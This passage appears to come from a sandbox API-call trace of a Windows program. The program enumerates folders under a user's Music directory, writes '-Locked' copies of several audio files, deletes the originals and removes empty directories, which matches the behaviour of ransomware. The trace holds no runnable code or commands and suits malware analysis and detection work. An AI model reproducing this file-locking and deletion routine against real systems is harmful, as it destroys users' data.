ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.146] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0303.146] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0303.147] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0303.147] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0303.147] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", lpFilePart=0x0) returned 0x27 [0303.147] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\", lpFilePart=0x0) returned 0x28 [0303.147] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.147] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.148] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0303.148] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0303.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0303.148] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", nBufferLength=0x105, lpBuffer=0x1aec60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX", lpFilePart=0x0) returned 0x27 [0303.148] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0ac) returned 1 [0303.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\fbhsx"), fInfoLevelId=0x0, lpFileInformation=0x1af12c | out: lpFileInformation=0x1af12c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x65d76d70, ftCreationTime.dwHighDateTime=0x1d7d7f7, ftLastAccessTime.dwLowDateTime=0xab458da0, ftLastAccessTime.dwHighDateTime=0x1d7e414, ftLastWriteTime.dwLowDateTime=0xab458da0, ftLastWriteTime.dwHighDateTime=0x1d7e414, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0303.148] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a8) returned 1 [0303.148] RemoveDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\fBHsX" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\fbhsx")) returned 1 [0303.149] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0303.149] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0303.149] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", lpFilePart=0x0) returned 0x26 [0303.149] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.149] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2rPx", cAlternateFileName="")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e914e10, ftCreationTime.dwHighDateTime=0x1d7dd1a, ftLastAccessTime.dwLowDateTime=0xda44a240, ftLastAccessTime.dwHighDateTime=0x1d7e0c1, ftLastWriteTime.dwLowDateTime=0xda44a240, ftLastWriteTime.dwHighDateTime=0x1d7e0c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6a46cyIDWw1W7", cAlternateFileName="6A46CY~1")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef7e6ce0, ftCreationTime.dwHighDateTime=0x1d7dccf, ftLastAccessTime.dwLowDateTime=0x5ab558e0, ftLastAccessTime.dwHighDateTime=0x1d7e20f, ftLastWriteTime.dwLowDateTime=0x5ab558e0, ftLastWriteTime.dwHighDateTime=0x1d7e20f, nFileSizeHigh=0x0, nFileSizeLow=0x6890, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8fm6xuzqvhnSj5.m4a", cAlternateFileName="M8FM6X~1.M4A")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac0b680, ftCreationTime.dwHighDateTime=0x1d7d94f, ftLastAccessTime.dwLowDateTime=0x90b11a20, ftLastAccessTime.dwHighDateTime=0x1d7de4e, ftLastWriteTime.dwLowDateTime=0x90b11a20, ftLastWriteTime.dwHighDateTime=0x1d7de4e, nFileSizeHigh=0x0, nFileSizeLow=0xb59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCAKqI8YUum4ME.m4a", cAlternateFileName="PCAKQI~1.M4A")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf891110, ftCreationTime.dwHighDateTime=0x1d7df62, ftLastAccessTime.dwLowDateTime=0xf7bb95c0, ftLastAccessTime.dwHighDateTime=0x1d7e0b4, ftLastWriteTime.dwLowDateTime=0xf7bb95c0, ftLastWriteTime.dwHighDateTime=0x1d7e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x0, dwReserved1=0x0, cFileName="T3x5b8zSJkixwc2ut.m4a", cAlternateFileName="T3X5B8~1.M4A")) returned 1 [0303.150] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3498800, ftCreationTime.dwHighDateTime=0x1d7e3e2, ftLastAccessTime.dwLowDateTime=0x4f965eb0, ftLastAccessTime.dwHighDateTime=0x1d7e52e, ftLastWriteTime.dwLowDateTime=0x4f965eb0, ftLastWriteTime.dwHighDateTime=0x1d7e52e, nFileSizeHigh=0x0, nFileSizeLow=0xc98b, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3", cAlternateFileName="YH5CY7~1.MP3")) returned 1 [0303.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0303.151] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0303.151] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0303.151] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af0d4) returned 1 [0303.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", nBufferLength=0x105, lpBuffer=0x1aebdc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ", lpFilePart=0x0) returned 0x25 [0303.151] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", nBufferLength=0x105, lpBuffer=0x1aebb0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\", lpFilePart=0x0) returned 0x26 [0303.151] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\*", lpFindFileData=0x1aedfc | out: lpFindFileData=0x1aedfc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.151] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe1113c30, ftCreationTime.dwHighDateTime=0x1d7db87, ftLastAccessTime.dwLowDateTime=0x881addf0, ftLastAccessTime.dwHighDateTime=0x1d7df0d, ftLastWriteTime.dwLowDateTime=0x881addf0, ftLastWriteTime.dwHighDateTime=0x1d7df0d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="2rPx", cAlternateFileName="")) returned 1 [0303.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e914e10, ftCreationTime.dwHighDateTime=0x1d7dd1a, ftLastAccessTime.dwLowDateTime=0xda44a240, ftLastAccessTime.dwHighDateTime=0x1d7e0c1, ftLastWriteTime.dwLowDateTime=0xda44a240, ftLastWriteTime.dwHighDateTime=0x1d7e0c1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="6a46cyIDWw1W7", cAlternateFileName="6A46CY~1")) returned 1 [0303.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef7e6ce0, ftCreationTime.dwHighDateTime=0x1d7dccf, ftLastAccessTime.dwLowDateTime=0x5ab558e0, ftLastAccessTime.dwHighDateTime=0x1d7e20f, ftLastWriteTime.dwLowDateTime=0x5ab558e0, ftLastWriteTime.dwHighDateTime=0x1d7e20f, nFileSizeHigh=0x0, nFileSizeLow=0x6890, dwReserved0=0x0, dwReserved1=0x0, cFileName="m8fm6xuzqvhnSj5.m4a", cAlternateFileName="M8FM6X~1.M4A")) returned 1 [0303.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ac0b680, ftCreationTime.dwHighDateTime=0x1d7d94f, ftLastAccessTime.dwLowDateTime=0x90b11a20, ftLastAccessTime.dwHighDateTime=0x1d7de4e, ftLastWriteTime.dwLowDateTime=0x90b11a20, ftLastWriteTime.dwHighDateTime=0x1d7de4e, nFileSizeHigh=0x0, nFileSizeLow=0xb59c, dwReserved0=0x0, dwReserved1=0x0, cFileName="PCAKqI8YUum4ME.m4a", cAlternateFileName="PCAKQI~1.M4A")) returned 1 [0303.152] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf891110, ftCreationTime.dwHighDateTime=0x1d7df62, ftLastAccessTime.dwLowDateTime=0xf7bb95c0, ftLastAccessTime.dwHighDateTime=0x1d7e0b4, ftLastWriteTime.dwLowDateTime=0xf7bb95c0, ftLastWriteTime.dwHighDateTime=0x1d7e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x710, dwReserved0=0x0, dwReserved1=0x0, cFileName="T3x5b8zSJkixwc2ut.m4a", cAlternateFileName="T3X5B8~1.M4A")) returned 1 [0303.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3498800, ftCreationTime.dwHighDateTime=0x1d7e3e2, ftLastAccessTime.dwLowDateTime=0x4f965eb0, ftLastAccessTime.dwHighDateTime=0x1d7e52e, ftLastWriteTime.dwLowDateTime=0x4f965eb0, ftLastWriteTime.dwHighDateTime=0x1d7e52e, nFileSizeHigh=0x0, nFileSizeLow=0xc98b, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3", cAlternateFileName="YH5CY7~1.MP3")) returned 1 [0303.153] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aee0c | out: lpFindFileData=0x1aee0c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe3498800, ftCreationTime.dwHighDateTime=0x1d7e3e2, ftLastAccessTime.dwLowDateTime=0x4f965eb0, ftLastAccessTime.dwHighDateTime=0x1d7e52e, ftLastWriteTime.dwLowDateTime=0x4f965eb0, ftLastWriteTime.dwHighDateTime=0x1d7e52e, nFileSizeHigh=0x0, nFileSizeLow=0xc98b, dwReserved0=0x0, dwReserved1=0x0, cFileName="yh5cY7Z6vtC s NBxY-E.mp3", cAlternateFileName="YH5CY7~1.MP3")) returned 0 [0303.153] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0303.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af094) returned 1 [0303.153] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af0a0) returned 1 [0303.153] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked", lpFilePart=0x0) returned 0x40 [0303.153] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef80) returned 1 [0303.153] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\m8fm6xuzqvhnsj5.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.154] GetFileType (hFile=0x49c) returned 0x1 [0303.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef7c) returned 1 [0303.154] GetFileType (hFile=0x49c) returned 0x1 [0303.156] CloseHandle (hObject=0x49c) returned 1 [0303.156] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a", nBufferLength=0x105, lpBuffer=0x1aec0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a", lpFilePart=0x0) returned 0x39 [0303.156] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\m8fm6xuzqvhnSj5.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\m8fm6xuzqvhnsj5.m4a")) returned 1 [0303.157] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked", lpFilePart=0x0) returned 0x3f [0303.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef80) returned 1 [0303.157] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\pcakqi8yuum4me.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.157] GetFileType (hFile=0x49c) returned 0x1 [0303.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef7c) returned 1 [0303.157] GetFileType (hFile=0x49c) returned 0x1 [0303.159] CloseHandle (hObject=0x49c) returned 1 [0303.159] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a", nBufferLength=0x105, lpBuffer=0x1aec0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a", lpFilePart=0x0) returned 0x38 [0303.160] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\PCAKqI8YUum4ME.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\pcakqi8yuum4me.m4a")) returned 1 [0303.160] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked", nBufferLength=0x105, lpBuffer=0x1aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked", lpFilePart=0x0) returned 0x42 [0303.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef80) returned 1 [0303.160] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\t3x5b8zsjkixwc2ut.m4a-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.161] GetFileType (hFile=0x49c) returned 0x1 [0303.161] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef7c) returned 1 [0303.161] GetFileType (hFile=0x49c) returned 0x1 [0303.162] CloseHandle (hObject=0x49c) returned 1 [0303.162] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a", nBufferLength=0x105, lpBuffer=0x1aec0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a", lpFilePart=0x0) returned 0x3b [0303.163] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\T3x5b8zSJkixwc2ut.m4a" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\t3x5b8zsjkixwc2ut.m4a")) returned 1 [0303.163] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked", nBufferLength=0x105, lpBuffer=0x1aea8c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked", lpFilePart=0x0) returned 0x45 [0303.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1aef80) returned 1 [0303.163] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\yh5cy7z6vtc s nbxy-e.mp3-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0303.174] GetFileType (hFile=0x49c) returned 0x1 [0303.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1aef7c) returned 1 [0303.174] GetFileType (hFile=0x49c) returned 0x1 [0303.178] CloseHandle (hObject=0x49c) returned 1 [0303.178] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3", nBufferLength=0x105, lpBuffer=0x1aec0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3", lpFilePart=0x0) returned 0x3e [0303.178] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\yh5cY7Z6vtC s NBxY-E.mp3" (normalized: "c:\\users\\rdhj0cnfevzx\\music\\suzai\\wyj\\yh5cy7z6vtc s nbxy-e.mp3")) returned 1 [0303.181] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af08c) returned 1 [0303.181] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", nBufferLength=0x105, lpBuffer=0x1aeb94, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx", lpFilePart=0x0) returned 0x2a [0303.188] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", nBufferLength=0x105, lpBuffer=0x1aeb68, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\", lpFilePart=0x0) returned 0x2b [0303.188] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Music\\Suzai\\WyJ\\2rPx\\*", lpFindFileData=0x1aedb4 | out: lpFindFileData=0x1aedb4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0303.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa134ae10, ftCreationTime.dwHighDateTime=0x1d7df9e, ftLastAccessTime.dwLowDateTime=0x14230c60, ftLastAccessTime.dwHighDateTime=0x1d7e219, ftLastWriteTime.dwLowDateTime=0x14230c60, ftLastWriteTime.dwHighDateTime=0x1d7e219, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0303.188] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aedc4 | out: lpFindFileData=0x1aedc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc1956800, ftCreationTime.dwHighDateTime=0x1d7e397, ftLastAccessTime.dwLowDateTime=0x9fb39f40, ftLastAccessTime.dwHighDateTime=0x1d7e473, ftLastWriteTime.dwLowDateTime=0x9fb39f40, ftLastWriteTime.dwHighDateTime=0x1d7e473, nFileSizeHigh=0x0, nFileSizeLow=0x17f2c, dwReserved0=0x0, 